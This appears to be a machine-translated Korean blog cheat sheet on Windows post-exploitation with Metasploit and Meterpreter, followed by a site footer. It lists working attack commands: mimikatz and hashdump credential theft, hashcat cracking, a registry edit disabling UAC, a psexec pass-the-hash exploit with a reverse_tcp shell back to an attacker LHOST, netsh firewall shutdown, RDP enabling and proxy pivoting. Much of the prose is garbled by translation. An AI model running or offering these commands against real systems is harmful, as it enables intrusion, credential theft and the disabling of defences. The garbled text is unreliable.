후침투 프로세스
권한 향상
UAC 우회
msf 모듈
시스템 제권
프로그램 실행 수준 향상
msf 모듈(post)
post/windows/gather/forensics/enum_drives
post/windows/gather/checkvm
post/windows/gather/enum_applications
post/windows/gather/enum_shares
post/windows/gather/dumplinks
post/windows/gather/enum_applications
enumpatches scraper
스크립트 경로:/usr/share/metasploit-framework/scripts/meterpretermeterpreter run scraper
) 정보를 저장하는 디렉터리:/root/.msf4/logs/scripts/scraper/192.xxx.xx.xx.xx winenum
스크립트(meterpreter에서run winenum)목적: 외곽과의 상호작용 장소를 잡는다. 내부 네트워크에 들어가는 방법을 찾을 수 없다(호스트는 방화벽에 있고 개방 포트가 적으며 서버의 서브넷이다)
가방을 쥐다
sniffer는 자신의merterpreter에서 발생하는 데이터를 필터하여 호스트와 관련된 패키지 정보를 직접 캡처합니다
load sniffer
sniffer_interfaces
sniffer_start 1
sniffer_dump 1 1.cap
meterpreter 모듈
잡다
기본: 암호 형식: 사용자 이름: RID: LM-HASH 값: NT-HASH 값 ###hash 값 가져오기
hashdump
run post/windows/gather/smart_hashdump
privilege::debug
#보기 권한sekurlsa::logonpasswords
#hash와 명문 비밀번호 가져오기(가능하면)sekurlsa::ekeys
#kerberos 암호화 증명서 획득hash 해독
기사: (https://www.anquanke.com/post/id/177123)
hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force
hash 전달 공격
UAC 레지스트리: HKEYLOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System
셸에 들어가기, 중국어 부호화, 입력
chcp 65001
셸 등록표 uac를 0reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
으로 변경use exploit/windows/smb/psexec set payload windows/meterpreter/reverse_tcp set LHOST 192.168.206.128 set RHOST 192.168.206.101 set SMBUser administrator set SMBPass AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C0 89C0 exploit
sekurlsa::pth /user:Administrator /domain:WIN-RRI9T9SN85D /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0
방화벽 및 백신 소프트웨어 닫기
- 방화벽 닫기(shell) - Netsh advfirewall set allprofiles state off(관리자 및 이상의 권한)
원격 데스크톱
run post/windows/manage/enable_rdp
(사각형1)run getgui -e
(방식2)run multi_console__command -r /root/.msf4/loot/20191206223922_default_192.168.85.157_host.windows.cle_974816.txt
(원격 데스크탑 닫기)run getgui -u root -p pass
원격 데스크탑을 열고 8888 포트에 바인딩
- `run getgui -e -f 8888`
load espia
screengrab
rdesktop -u root -p 123 192.168.85.157
EA\Administrator
널뛰기 공격
ProxyChains 프록시 설정
auxiliary/server/socks4a
뒷문에 심다
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
cve-2019-0708 msf 실행 오류 해결cve-2019-0708 msf 실행 오류 해결 서버에 빈틈이 있는지 검사하는 과정에서 exploit의 오류가 발견되었고 오류 정보는 다음과 같다. 이미 뚜렷하다Exploit aborted due to failure...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.